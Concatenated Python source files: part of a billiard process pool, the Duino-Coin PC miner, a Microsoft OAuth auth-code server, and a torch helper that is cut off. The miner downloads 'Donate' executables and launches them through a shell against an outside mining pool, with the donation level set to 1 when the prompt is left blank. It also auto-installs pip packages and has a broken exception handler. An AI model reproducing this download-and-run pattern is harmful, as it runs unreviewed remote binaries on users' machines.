self._error_callback, self._value)
def _ack(self, i, time_accepted, pid, synqW_fd):
with self._mutex:
if self._cancelled and self._send_ack:
self._accepted = True
if synqW_fd:
return self._send_ack(NACK, pid, self._job, synqW_fd)
return
self._accepted = True
self._time_accepted = time_accepted
self._worker_pid = pid
if self.ready():
# ack received after set()
self._cache.pop(self._job, None)
if self._on_timeout_set:
self._on_timeout_set(self, self._soft_timeout, self._timeout)
response = ACK
if self._accept_callback:
try:
self._accept_callback(pid, time_accepted)
except self._propagate_errors:
response = NACK
raise
except Exception:
response = NACK
# ignore other errors
finally:
if self._send_ack and synqW_fd:
return self._send_ack(
response, pid, self._job, synqW_fd
)
if self._send_ack and synqW_fd:
self._send_ack(response, pid, self._job, synqW_fd)
#
# Class whose instances are returned by `Pool.map_async()`
#
class MapResult(ApplyResult):
def __init__(self, cache, chunksize, length, callback, error_callback):
ApplyResult.__init__(
self, cache, callback, error_callback=error_callback,
)
self._success = True
self._length = length
self._value = [None] * length
self._accepted = [False] * length
self._worker_pid = [None] * length
self._time_accepted = [None] * length
self._chunksize = chunksize
if chunksize <= 0:
self._number_left = 0
self._event.set()
del cache[self._job]
else:
self._number_left = length // chunksize + bool(length % chunksize)
def _set(self, i, success_result):
success, result = success_result
if success:
self._value[i * self._chunksize:(i + 1) * self._chunksize] = result
self._number_left -= 1
if self._number_left == 0:
if self._callback:
self._callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
else:
self._success = False
self._value = result
if self._error_callback:
self._error_callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
def _ack(self, i, time_accepted, pid, *args):
start = i * self._chunksize
stop = min((i + 1) * self._chunksize, self._length)
for j in range(start, stop):
self._accepted[j] = True
self._worker_pid[j] = pid
self._time_accepted[j] = time_accepted
if self.ready():
self._cache.pop(self._job, None)
def accepted(self):
return all(self._accepted)
def worker_pids(self):
return [pid for pid in self._worker_pid if pid]
#
# Class whose instances are returned by `Pool.imap()`
#
class IMapIterator(object):
_worker_lost = None
def __init__(self, cache, lost_worker_timeout=LOST_WORKER_TIMEOUT):
self._cond = threading.Condition(threading.Lock())
self._job = next(job_counter)
self._cache = cache
self._items = deque()
self._index = 0
self._length = None
self._ready = False
self._unsorted = {}
self._worker_pids = []
self._lost_worker_timeout = lost_worker_timeout
cache[self._job] = self
def __iter__(self):
return self
def next(self, timeout=None):
with self._cond:
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
self._cond.wait(timeout)
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
raise TimeoutError
success, value = item
if success:
return value
raise Exception(value)
__next__ = next # XXX
def _set(self, i, obj):
with self._cond:
if self._index == i:
self._items.append(obj)
self._index += 1
while self._index in self._unsorted:
obj = self._unsorted.pop(self._index)
self._items.append(obj)
self._index += 1
self._cond.notify()
else:
self._unsorted[i] = obj
if self._index == self._length:
self._ready = True
del self._cache[self._job]
def _set_length(self, length):
with self._cond:
self._length = length
if self._index == self._length:
self._ready = True
self._cond.notify()
del self._cache[self._job]
def _ack(self, i, time_accepted, pid, *args):
self._worker_pids.append(pid)
def ready(self):
return self._ready
def worker_pids(self):
return self._worker_pids
#
# Class whose instances are returned by `Pool.imap_unordered()`
#
class IMapUnorderedIterator(IMapIterator):
def _set(self, i, obj):
with self._cond:
self._items.append(obj)
self._index += 1
self._cond.notify()
if self._index == self._length:
self._ready = True
del self._cache[self._job]
#
#
#
class ThreadPool(Pool):
from billiard.dummy import Process as DummyProcess
Process = DummyProcess
def __init__(self, processes=None, initializer=None, initargs=()):
Pool.__init__(self, processes, initializer, initargs)
def _setup_queues(self):
self._inqueue = Queue()
self._outqueue = Queue()
self._quick_put = self._inqueue.put
self._quick_get = self._outqueue.get
def _poll_result(timeout):
try:
return True, self._quick_get(timeout=timeout)
except Empty:
return False, None
self._poll_result = _poll_result
@staticmethod
def _help_stuff_finish(inqueue, task_handler, pool):
# put sentinels at head of inqueue to make workers finish
with inqueue.not_empty:
inqueue.queue.clear()
inqueue.queue.extend([None] * len(pool))
inqueue.not_empty.notify_all()
|
PC_Miner.py
|
#!/usr/bin/env python3
"""
Duino-Coin Official PC Miner 2.7.3 © MIT licensed
https://duinocoin.com
https://github.com/revoxhere/duino-coin
Duino-Coin Team & Community 2019-2021
"""
from time import time, sleep, strptime, ctime
from hashlib import sha1
from socket import socket
from multiprocessing import Lock as thread_lock
from multiprocessing import cpu_count, current_process
from multiprocessing import Process, Manager
from threading import Thread
from datetime import datetime
from random import randint
from os import execl, mkdir, _exit
from subprocess import DEVNULL, Popen, check_call
import pip
import sys
import os
import json
import requests
from pathlib import Path
from re import sub
from random import choice
from platform import machine as osprocessor
from signal import SIGINT, signal
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from configparser import ConfigParser
configparser = ConfigParser()
def handler(signal_received, frame):
"""
Nicely handle CTRL+C exit
"""
if current_process().name == "MainProcess":
pretty_print(
get_string("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ get_string("goodbye"),
"warning")
_exit(0)
def install(package):
"""
Automatically installs python pip package and restarts the program
"""
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
execl(sys.executable, sys.executable, *sys.argv)
try:
from xxhash import xxh64
xxhash_en = True
except ModuleNotFoundError:
print("Xxhash is not installed - this mining algorithm will be disabled")
xxhash_en = False
try:
from colorama import Back, Fore, Style, init
init(autoreset=True)
except ModuleNotFoundError:
print("Colorama is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install colorama")
install("colorama")
try:
import cpuinfo
except ModuleNotFoundError:
print("Cpuinfo is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install py-cpuinfo")
install("py-cpuinfo")
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pypresence")
install("pypresence")
class Settings:
"""
Class containing default miner and server settings
"""
ENCODING = "UTF8"
SEPARATOR = ","
VER = 2.73
DATA_DIR = "Duino-Coin PC Miner " + str(VER)
TRANSLATIONS = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
TRANSLATIONS_FILE = "/Translations.json"
SETTINGS_FILE = "/Settings.cfg"
SOC_TIMEOUT = 15
REPORT_TIME = 50
DONATE_LVL = 0
BLOCK = " ‖ "
PICK = ""
COG = " @"
if os.name != "nt":
# Windows' cmd does not support emojis, shame!
PICK = " ⛏"
COG = " ⚙"
class Algorithms:
"""
Class containing algorithms used by the miner
For more info about the implementation refer to the Duino whitepaper:
https://github.com/revoxhere/duino-coin/blob/gh-pages/assets/whitepaper.pdf
"""
def DUCOS1(last_h: str, exp_h: str, diff: int, eff: int):
time_start = time()
base_hash = sha1(last_h.encode('ascii'))
for nonce in range(100 * diff + 1):
temp_h = base_hash.copy()
temp_h.update(str(nonce).encode('ascii'))
d_res = temp_h.hexdigest()
if d_res == exp_h:
time_elapsed = time() - time_start
hashrate = nonce / time_elapsed
return [nonce, hashrate]
return [0, 0]
def XXHASH(last_h: str, exp_h: str, diff: int, eff: int):
time_start = time()
for nonce in range(100 * diff + 1):
d_res = xxh64(last_h + str(nonce),
seed=2811).hexdigest()
if d_res == exp_h:
time_elapsed = time() - time_start
hashrate = nonce / time_elapsed
return [nonce, hashrate]
return [0, 0]
class Client:
"""
Class helping to organize socket connections
"""
def connect(pool: tuple):
global s
s = socket()
s.settimeout(Settings.SOC_TIMEOUT)
s.connect((pool))
def send(msg: str):
sent = s.sendall(str(msg).encode(Settings.ENCODING))
return True
def recv(limit: int = 128):
data = s.recv(limit).decode(Settings.ENCODING).rstrip("\n")
return data
def fetch_pool():
"""
Fetches best pool from the /getPool API endpoint
"""
while True:
pretty_print(" " + get_string("connection_search"),
"warning", "net0")
try:
response = requests.get(
"https://server.duinocoin.com/getPool").json()
if response["success"] == True:
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
return (NODE_ADDRESS, NODE_PORT)
elif "message" in response:
pretty_print(f"Warning: {response['message']}"
+ ", retrying in 15s", "warning", "net0")
sleep(10)
else:
raise Exception(
"no response - IP ban or connection error")
except Exception as e:
pretty_print(f"Error fetching mining node: {e}"
+ ", retrying in 15s", "error", "net0")
sleep(15)
class Donate:
def load(donation_level):
if donation_level > 0:
if os.name == 'nt':
if not Path(
f"{Settings.DATA_DIR}/Donate.exe").is_file():
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableWindows.exe')
r = requests.get(url)
with open(f"{Settings.DATA_DIR}/Donate.exe",
'wb') as f:
f.write(r.content)
elif os.name == "posix":
if osprocessor() == "aarch64":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH64')
elif osprocessor() == "armv7l":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH32')
else:
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableLinux')
if not Path(
f"{Settings.DATA_DIR}/Donate").is_file():
r = requests.get(url)
with open(f"{Settings.DATA_DIR}/Donate",
"wb") as f:
f.write(r.content)
def start(donation_level):
if os.name == 'nt':
cmd = (f'cd "{Settings.DATA_DIR}" & start /low /b Donate.exe '
+ '-o stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*10}')
elif os.name == 'posix':
cmd = (f'cd "{Settings.DATA_DIR}" && chmod +x Donate '
+ '&& nice -20 ./Donate -o '
+ 'stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*10}')
if donation_level <= 0:
pretty_print(
Fore.YELLOW + get_string('free_network_warning').lstrip()
+ get_string('donate_warning').replace("\n", "\n\t\t")
+ Fore.GREEN + 'https://duinocoin.com/donate'
+ Fore.YELLOW + get_string('learn_more_donate'),
'warning', 'sys0')
sleep(5)
if donation_level > 0:
donateExecutable = Popen(cmd, shell=True, stderr=DEVNULL)
pretty_print(get_string('thanks_donation').replace("\n", "\n\t\t"),
'error', 'sys0')
def get_prefix(symbol: str,
val: float,
accuracy: int):
"""
H/s, 1000 => 1 kH/s
"""
if val >= 1_000_000_000_000: # Really?
val = str(round((val / 1_000_000_000_000), accuracy)) + " T"
elif val >= 1_000_000_000:
val = str(round((val / 1_000_000_000), accuracy)) + " G"
elif val >= 1_000_000:
val = str(round((val / 1_000_000), accuracy)) + " M"
elif val >= 1_000:
val = str(round((val / 1_000))) + " k"
else:
val = str(round(val)) + " "
return val + symbol
def periodic_report(start_time, end_time,
shares, hashrate, uptime):
"""
Displays nicely formated uptime stats
"""
seconds = round(end_time - start_time)
pretty_print(get_string("periodic_mining_report")
+ Fore.RESET + Style.NORMAL
+ get_string("report_period")
+ str(seconds) + get_string("report_time")
+ get_string("report_body1")
+ str(shares) + get_string("report_body2")
+ str(round(shares/seconds, 1))
+ get_string("report_body3")
+ get_string("report_body4")
+ str(get_prefix("H/s", hashrate, 2))
+ get_string("report_body5")
+ str(int(hashrate*seconds))
+ get_string("report_body6")
+ get_string("total_mining_time")
+ str(uptime), "success")
def calculate_uptime(start_time):
"""
Returns seconds, minutes or hours passed since timestamp
"""
uptime = time() - start_time
if uptime <= 59:
return str(round(uptime)) + get_string("uptime_seconds")
elif uptime == 60:
return str(round(uptime // 60)) + get_string("uptime_minute")
elif uptime >= 60:
return str(round(uptime // 60)) + get_string("uptime_minutes")
elif uptime == 3600:
return str(round(uptime // 3600)) + get_string("uptime_hour")
elif uptime >= 3600:
return str(round(uptime // 3600)) + get_string("uptime_hours")
def pretty_print(msg: str = None,
state: str = "success",
sender: str = "sys0"):
"""
Produces nicely formatted CLI output for messages:
HH:MM:S |sender| msg
"""
if sender.startswith("net"):
bg_color = Back.BLUE
elif sender.startswith("cpu"):
bg_color = Back.YELLOW
elif sender.startswith("sys"):
bg_color = Back.GREEN
if state == "success":
fg_color = Fore.GREEN
elif state == "error":
fg_color = Fore.RED
else:
fg_color = Fore.YELLOW
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT + bg_color + " " + sender + " "
+ Back.RESET + " " + fg_color + msg.strip())
def share_print(id, type,
accept, reject,
hashrate, total_hashrate,
computetime, diff, ping,
back_color):
"""
Produces nicely formatted CLI output for shares:
HH:MM:S |cpuN| ⛏ Accepted 0/0 (100%) ∙ 0.0s ∙ 0 kH/s ⚙ diff 0 k ∙ ping 0ms
"""
total_hashrate = get_prefix("H/s", total_hashrate, 2)
diff = get_prefix("", int(diff), 0)
if type == "accept":
share_str = get_string("accepted")
fg_color = Fore.GREEN
elif type == "block":
share_str = get_string("block_found")
fg_color = Fore.YELLOW
else:
share_str = get_string("rejected")
fg_color = Fore.RED
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Fore.WHITE + Style.BRIGHT + back_color + Fore.RESET
+ " cpu" + str(id) + " " + Back.RESET
+ fg_color + Settings.PICK + share_str + Fore.RESET
+ str(accept) + "/" + str(accept + reject) + Fore.YELLOW
+ " (" + str(round(accept / (accept + reject) * 100)) + "%)"
+ Style.NORMAL + Fore.RESET
+ " ∙ " + str("%04.1f" % float(computetime)) + "s"
+ Style.NORMAL + " ∙ " + Fore.BLUE + Style.BRIGHT
+ str(total_hashrate) + Fore.RESET + Style.NORMAL
+ Settings.COG + f" diff {diff} ∙ " + Fore.CYAN
+ f"ping {(int(ping))}ms")
def get_string(string_name):
"""
Gets a string from the language file
"""
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
class Miner:
def greeting():
diff_str = get_string("net_diff_short")
if user_settings["start_diff"] == "LOW":
diff_str = get_string("low_diff_short")
elif user_settings["start_diff"] == "MEDIUM":
diff_str = get_string("medium_diff_short")
current_hour = strptime(ctime(time())).tm_hour
greeting = get_string("greeting_back")
if current_hour < 12:
greeting = get_string("greeting_morning")
elif current_hour == 12:
greeting = get_string("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = get_string("greeting_afternoon")
elif current_hour >= 18:
greeting = get_string("greeting_evening")
print("\n" + Style.DIM + Fore.YELLOW + Settings.BLOCK + Fore.YELLOW
+ Style.BRIGHT + get_string("banner") + Style.RESET_ALL
+ Fore.MAGENTA + " (" + str(Settings.VER) + ") "
+ Fore.RESET + "2019-2021")
print(Style.DIM + Fore.YELLOW + Settings.BLOCK + Style.NORMAL
+ Fore.YELLOW + "https://github.com/revoxhere/duino-coin")
if lang != "english":
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + lang.capitalize()
+ " translation: " + Fore.YELLOW
+ get_string("translation_autor"))
try:
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + "CPU: " + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["threads"])
+ "x " + str(cpu["brand_raw"]))
except:
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + "CPU: " + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["threads"])
+ "x threads")
if os.name == "nt" or os.name == "posix":
print(Style.DIM + Fore.YELLOW
+ Settings.BLOCK + Style.NORMAL + Fore.RESET
+ get_string("donation_level") + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["donate"]))
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + get_string("algorithm")
+ Style.BRIGHT + Fore.YELLOW + user_settings["algorithm"]
+ Settings.COG + " " + diff_str)
if user_settings["identifier"] != "None":
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + get_string("rig_identifier")
+ Style.BRIGHT + Fore.YELLOW + user_settings["identifier"])
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + str(greeting)
+ ", " + Style.BRIGHT + Fore.YELLOW
+ str(user_settings["username"]) + "!\n")
def preload():
"""
Creates needed directories and files for the miner
"""
global lang_file
global lang
if not Path(Settings.DATA_DIR).is_dir():
mkdir(Settings.DATA_DIR)
if not Path(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE).is_file():
with open(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE,
"wb") as f:
f.write(requests.get(Settings.TRANSLATIONS).content)
with open(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE, "r",
encoding=Settings.ENCODING) as file:
lang_file = json.load(file)
try:
if not Path(Settings.DATA_DIR + Settings.SETTINGS_FILE).is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("mt"):
lang = "maltese"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("pr"):
lang = "portugese"
elif locale.startswith("it"):
lang = "italian"
elif locale.startswith("zh"):
lang = "chinese_simplified"
elif locale.startswith("th"):
lang = "thai"
else:
lang = "english"
else:
try:
configparser.read(Settings.DATA_DIR
+ Settings.SETTINGS_FILE)
lang = configparser["PC Miner"]["language"]
except Exception:
lang = "english"
except Exception as e:
print("Error with lang file, falling back to english: " + str(e))
lang = "english"
def load_cfg():
"""
Loads miner settings file or starts the config tool
"""
if not Path(Settings.DATA_DIR + Settings.SETTINGS_FILE).is_file():
print(get_string("basic_config_tool")
+ Settings.DATA_DIR
+ get_string("edit_config_file_warning")
+ "\n"
+ get_string("dont_have_account")
+ Fore.YELLOW
+ get_string("wallet")
+ Fore.RESET
+ get_string("register_warning"))
username = input(get_string("ask_username") + Style.BRIGHT)
if not username:
username = choice(["revox", "Bilaboz", "JoyBed", "Connor2"])
algorithm = "DUCO-S1"
if xxhash_en:
print(Style.BRIGHT
+ "1" + Style.NORMAL + " - DUCO-S1 ("
+ get_string("recommended")
+ ")\n" + Style.BRIGHT
+ "2" + Style.NORMAL + " - XXHASH")
prompt = sub(r"\D", "",
input(get_string("ask_algorithm")
+ Style.BRIGHT))
if prompt == "2":
algorithm = "XXHASH"
intensity = 100 # None
##
# intensity = sub(r"\D", "",
# input(Style.NORMAL
## + get_string("ask_intensity")
# + Style.BRIGHT))
# if not intensity:
## intensity = 95
# elif float(intensity) > 100:
## intensity = 100
# elif float(intensity) < 1:
## intensity = 1
threads = sub(r"\D", "",
input(Style.NORMAL + get_string("ask_threads")
+ str(cpu_count()) + "): " + Style.BRIGHT))
if not threads:
threads = cpu_count()
if int(threads) > 8:
threads = 8
pretty_print(
Style.BRIGHT
+ get_string("max_threads_notice"))
elif int(threads) < 1:
threads = 1
print(Style.BRIGHT
+ "1" + Style.NORMAL + " - " + get_string("low_diff")
+ "\n" + Style.BRIGHT
+ "2" + Style.NORMAL + " - " + get_string("medium_diff")
+ "\n" + Style.BRIGHT
+ "3" + Style.NORMAL + " - " + get_string("net_diff"))
start_diff = sub(r"\D", "",
input(Style.NORMAL + get_string("ask_difficulty")
+ Style.BRIGHT))
if start_diff == "1":
start_diff = "LOW"
elif start_diff == "3":
start_diff = "NET"
else:
start_diff = "MEDIUM"
rig_id = input(Style.NORMAL + get_string("ask_rig_identifier")
+ Style.BRIGHT)
if rig_id.lower() == "y":
rig_id = str(input(Style.NORMAL + get_string("ask_rig_name")
+ Style.BRIGHT))
else:
rig_id = "None"
donation_level = '0'
if os.name == 'nt' or os.name == 'posix':
donation_level = input(Style.NORMAL
+ get_string('ask_donation_level')
+ Style.BRIGHT)
donation_level = sub(r'\D', '', donation_level)
if donation_level == '':
donation_level = 1
if float(donation_level) > int(5):
donation_level = 5
if float(donation_level) < int(0):
donation_level = 0
configparser["PC Miner"] = {
"username": username,
"intensity": intensity,
"threads": threads,
"start_diff": start_diff,
"donate": int(donation_level),
"identifier": rig_id,
"algorithm": algorithm,
"language": lang,
"soc_timeout": Settings.SOC_TIMEOUT,
"report_sec": Settings.REPORT_TIME,
"discord_rp": "y"}
with open(Settings.DATA_DIR + Settings.SETTINGS_FILE,
"w") as configfile:
configparser.write(configfile)
print(Style.RESET_ALL + get_string("config_saved"))
configparser.read(Settings.DATA_DIR
+ Settings.SETTINGS_FILE)
return configparser["PC Miner"]
def m_connect(id, pool):
retry_count = 0
while True:
try:
if retry_count > 3:
pool = Client.fetch_pool()
retry_count = 0
socket_connection = Client.connect(pool)
POOL_VER = Client.recv(5)
if id == 0:
Client.send("MOTD")
motd = Client.recv(512).replace("\n", "\n\t\t")
pretty_print("MOTD: " + Fore.RESET + Style.NORMAL
+ str(motd), "success", "net" + str(id))
if float(POOL_VER) <= Settings.VER:
pretty_print(get_string("connected") + Fore.RESET
+ Style.NORMAL +
get_string("connected_server")
+ str(POOL_VER) + ", " + pool[0] + ":"
+ str(pool[1]) + ")", "success",
"net" + str(id))
else:
pretty_print(get_string("outdated_miner")
+ str(Settings.VER) + ") -"
+ get_string("server_is_on_version")
+ str(POOL_VER) + Style.NORMAL
+ Fore.RESET +
get_string("update_warning"),
"warning", "net" + str(id))
sleep(5)
break
except:
pretty_print(get_string('connecting_error')
+ Style.NORMAL + f' (connection err: {e})',
'error', 'net0')
retry_counter += 1
sleep(10)
def mine(id: int, user_settings: list,
pool: tuple,
accept: int, reject: int,
hashrate: list,
single_miner_id: str):
"""
Main section that executes the functionalities from the sections above.
"""
using_algo = get_string("using_algo")
if user_settings["algorithm"] == "XXHASH":
using_algo = get_string("using_algo_xxh")
pretty_print(get_string("mining_thread") + str(id)
+ get_string("mining_thread_starting")
+ Style.NORMAL + Fore.RESET + using_algo + Fore.YELLOW
+ str(user_settings["intensity"])
+ "% " + get_string("efficiency"),
"success", "sys"+str(id))
last_report = time()
r_shares, last_shares = 0, 0
while True:
try:
Miner.m_connect(id, pool)
while True:
try:
while True:
job_req = "JOB"
if user_settings["algorithm"] == "XXHASH":
job_req = "JOBXX"
Client.send(job_req
+ Settings.SEPARATOR
+ str(user_settings["username"])
+ Settings.SEPARATOR
+ str(user_settings["start_diff"]))
job = Client.recv().split(Settings.SEPARATOR)
if len(job) == 3:
break
else:
pretty_print(
"Node message: " + str(job[1]),
"warning")
sleep(3)
while True:
time_start = time()
if user_settings["algorithm"] == "XXHASH":
back_color = Back.CYAN
result = Algorithms.XXHASH(
job[0], job[1], int(job[2]),
user_settings["intensity"])
else:
back_color = Back.YELLOW
result = Algorithms.DUCOS1(
job[0], job[1], int(job[2]),
user_settings["intensity"])
computetime = time() - time_start
hashrate[id] = result[1]
total_hashrate = sum(hashrate.values())
while True:
Client.send(f"{result[0]}"
+ Settings.SEPARATOR
+ f"{result[1]}"
+ Settings.SEPARATOR
+ "Official PC Miner"
+ f" {Settings.VER}"
+ Settings.SEPARATOR
+ f"{user_settings['identifier']}"
+ Settings.SEPARATOR
+ Settings.SEPARATOR
+ f"{single_miner_id}")
time_start = time()
feedback = Client.recv(
).split(Settings.SEPARATOR)
ping = (time() - time_start) * 1000
if feedback[0] == "GOOD":
accept.value += 1
share_print(id, "accept",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
elif feedback[0] == "BLOCK":
reject.value += 1
share_print(id, "block",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
elif feedback[0] == "BAD":
reject.value += 1
share_print(id, "reject",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
if id == 0:
end_time = time()
elapsed_time = end_time - last_report
if elapsed_time >= Settings.REPORT_TIME:
r_shares = accept.value - last_shares
uptime = calculate_uptime(
mining_start_time)
periodic_report(last_report, end_time,
r_shares,
sum(hashrate.values()),
uptime)
last_report = time()
last_shares = accept.value
break
break
except Exception as e:
pretty_print(get_string("error_while_mining")
+ " " + str(e), "error", "net" + str(id))
sleep(5)
break
except Exception as e:
pass
class Discord_rp:
def connect():
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
Thread(target=Discord_rp.update).start()
except Exception as e:
#print("Error launching Discord RPC thread: " + str(e))
pass
def update():
while True:
try:
total_hashrate = get_prefix("H/s", sum(hashrate.values()), 2)
RPC.update(details="Hashrate: " + str(total_hashrate),
start=mining_start_time,
state=str(accept.value) + "/"
+ str(reject.value + accept.value)
+ " accepted shares",
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything"
+ ", including AVR boards",
buttons=[{"label": "Visit duinocoin.com",
"url": "https://duinocoin.com"},
{"label": "Join the Discord",
"url": "https://discord.gg/k48Ht5y"}])
except Exception as e:
#print("Error updating Discord RPC thread: " + str(e))
pass
sleep(15)
Miner.preload()
p_list = []
mining_start_time = time()
if __name__ == "__main__":
from multiprocessing import freeze_support
freeze_support()
cpu = cpuinfo.get_cpu_info()
accept = Manager().Value("i", 0)
reject = Manager().Value("i", 0)
hashrate = Manager().dict()
signal(SIGINT, handler)
user_settings = Miner.load_cfg()
Miner.greeting()
fastest_pool = Client.fetch_pool()
Donate.load(int(user_settings["donate"]))
Donate.start(int(user_settings["donate"]))
"""
Generate a random number that's used only to
make the wallets display one miner with many threads
instead of many separate miners clogging it up
(like it was before release 2.7.3)
"""
single_miner_id = randint(0, 2811)
threads = int(user_settings["threads"])
if threads > 8:
threads = 8
pretty_print(Style.BRIGHT
+ get_string("max_threads_notice"))
for i in range(threads):
p = Process(target=Miner.mine,
args=[i, user_settings,
fastest_pool, accept, reject,
hashrate, single_miner_id])
p_list.append(p)
p.start()
sleep(0.05)
Discord_rp.connect()
for p in p_list:
p.join()
|
GetAuthCodeServer.py
|
'''
------------------------------------------------------------------------------
Copyright (c) 2015 Microsoft Corporation
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
------------------------------------------------------------------------------
'''
try:
from http.server import HTTPServer, BaseHTTPRequestHandler
except ImportError:
from SimpleHTTPServer import SimpleHTTPRequestHandler as BaseHTTPRequestHandler
from SocketServer import TCPServer as HTTPServer
try:
from urllib.parse import urlparse, parse_qs, unquote
except ImportError:
from urlparse import urlparse, parse_qs
from urllib import unquote
import threading
import webbrowser
def get_auth_code(auth_url, redirect_uri):
"""Easy way to get the auth code. Wraps up all the threading
and stuff. Does block main thread.
Args:
auth_url (str): URL of auth server.
redirect_uri (str): Redirect URI, as set for the app. Should be
something like "http://localhost:8080" for this to work.
Returns:
str: A string representing the auth code, sent back by the server
"""
url_netloc = urlparse(redirect_uri).netloc
if ':' not in url_netloc:
host_address = url_netloc
port = 80 # default port
else:
host_address, port = url_netloc.split(':')
port = int(port)
# Set up HTTP server and thread
code_acquired = threading.Event()
s = GetAuthCodeServer((host_address, port), code_acquired, GetAuthCodeRequestHandler)
th = threading.Thread(target=s.serve_forever)
th.start()
webbrowser.open(auth_url)
# At this point the browser will open and the code
# will be extracted by the server
code_acquired.wait() # First wait for the response from the auth server
code = s.auth_code
s.shutdown()
th.join()
return code
class GetAuthCodeServer(HTTPServer, object):
def __init__(self, server_address, stop_event, RequestHandlerClass):
HTTPServer.__init__(self, server_address, RequestHandlerClass)
self._stop_event = stop_event
self.auth_code = None
@property
def auth_code(self):
return self._auth_code
@auth_code.setter
def auth_code(self, value):
self._auth_code = value
if value is not None:
self._stop_event.set()
class GetAuthCodeRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
params = parse_qs(urlparse(self.path).query)
if "code" in params:
# Extract the code query param
self.server.auth_code = params["code"][0]
if "error" in params:
error_msg, error_desc = (unquote(params["error"][0]),
unquote(params["error_description"][0]))
raise RuntimeError("The server returned an error: {} - {}"
.format(error_msg, error_desc))
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(bytes(
'<script type="text/javascript">window.close()</script>'
.encode("utf-8")))
|
data_helper.py
|
from typing import Iterable, Any, Optional
from collections.abc import Sequence
import numbers
import time
from threading import Thread
from queue import Queue
import numpy as np
import torch
def to_device(item: Any, device: str, ignore_keys: list = []) -> Any:
r"""
Overview:
Transfer data to certain device
Arguments:
- item (:obj:`Any`): the item to be transferred
- device (:obj:`str`): the device wanted
- ignore_keys (:obj:`list`): the keys to be ignored in transfer, defalut set to empty
Returns:
- item (:obj:`Any`): the transferred item
.. note:
Now supports item type: :obj:`torch.nn.Module`, :obj:`torch.Tensor`, :obj:`Sequence`, \
:obj:`dict`, :obj:`numbers.Integral`, :obj:`numbers.Real`, :obj:`np.ndarray`, :obj:`str` and :obj:`None`.
"""
if isinstance(item, torch.nn.Module):
return item.to(device)
elif isinstance(item, torch.Tensor):
return item.to(device)
elif isinstance(item, Sequence):
if isinstance(item, str):
return item
else:
return [to_device(t, device) for t in item]
elif isinstance(item, dict):
new_item = {}
